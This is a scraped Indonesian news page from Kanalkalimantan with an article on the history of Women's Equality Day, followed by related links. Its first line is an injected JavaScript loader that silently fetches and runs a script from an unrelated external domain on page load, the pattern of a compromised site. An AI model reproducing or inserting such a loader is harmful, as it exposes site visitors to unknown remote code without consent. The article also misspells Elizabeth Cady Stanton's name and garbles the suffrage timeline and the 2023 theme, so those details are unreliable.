(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Infografis Kanalkalimantan

26 Agustus Hari Kesetaraan Perempuan, Ini Sejarahnya


KANALKALIMANTAN.COM – Hari Kesetaraan Perempuan atau Women’s Equality Day diperingati setiap 26 Agustus.

Melansir laman National Women’s History Alliance, Hari Kesetaraan Perempuan itu diinisiasi oleh Bella Abzug pada 1971. Akhirnya pada 1973, Kongres AS menetapkan 26 Agustus sah sebagai “Hari Kesetaraan Perempuan.”

Tanggal tersebut dipilih untuk memperingati pengesahan Amandemen ke-19 Konstitusi AS pada 1920. Ketika itu, Konstitusi AS secara resmi memberikan perempuan hak untuk memilih.

Pengesahan Amandemen ke-19 ini merupakan puncak dari gerakan hak-hak sipil besar dan damai yang dilakukan oleh para perempuan. Gerakan ini mulai bergeliat sejak 1848 pada konvensi hak-hak perempuan pertama di dunia, di Seneca Falls, New York.

Baca juga: Dua Titik Api di Kabupaten Banjar, Sempat Padam Selang 15 Jam Nyala Kembali

Hari Kesetaraan Perempuan yang telah berjalan hingga kini tidak hanya memperingati berlakunya Amandemen ke-19. Namun, peringatan ini juga merupakan kampanye terhadap berbagai upaya berkelanjutan para perempuan menuju kesetaraan penuh.

Pada tahun 1920 juga menjadi momentum pengesahan Amandemen Konstitusi ke-19 di Amerika Serikat. Pengesahan ini diratifikasi untuk mendukung kesetaraan bagi semua orang tanpa memandang gender.

Perjuangan untuk mendapatkan kesetaraan ini berawal dari gerakan para perempuan dalam memperoleh hak pilih yang di pelopori oleh aktivis Elizabeth Candy Stanton dan Lucretia Mott di Seneca Falls, New York, tahun 1848.

Baca juga: Dua Titik Api di Kabupaten Banjar, Sempat Padam Selang 15 Jam Nyala Kembali

Namun gerakan ini tidak membuahkan hasil. Barulah dua tahun berikutnya, setelah keterlibatan perempuan dalam Perang Dunia I di tahun 1914-1918, menjadi awal pemberian hak pilih terhadap perempuan.

 

Tema Hari Kesetaraan Perempuan 2023

Setiap tahunnya hari kesetaraan perempuan memiliki tema yang berbeda-beda. Melansir dari wtsinternational.org, tema Hari Kesetaraan Perempuan tahun 2023 ini adalah #EmbraceEquity atau merangkul kesetaraan.

Baca juga: Diduga Saling Ejek, Pelajar di Blitar Meninggal Dunia Dihajar Teman Satu Sekolah

Adanya tema ini, sebagai bentuk untuk prioritas terhadap masalah kesetaraan dan memberikan akses kepada wanita untuk bebas melakukan apapun.

Dengan itu, diharapkan tak akan ada lagi perempuan yang mengalami masalah ketidaksetaraan baik di lingkungan pekerjaan maupun dalam aspek kehidupan. (Kanalkalimantan.com/kk)

Editor : kk


Risa

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

10 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

11 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

12 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

13 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

16 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

19 jam ago

This website uses cookies.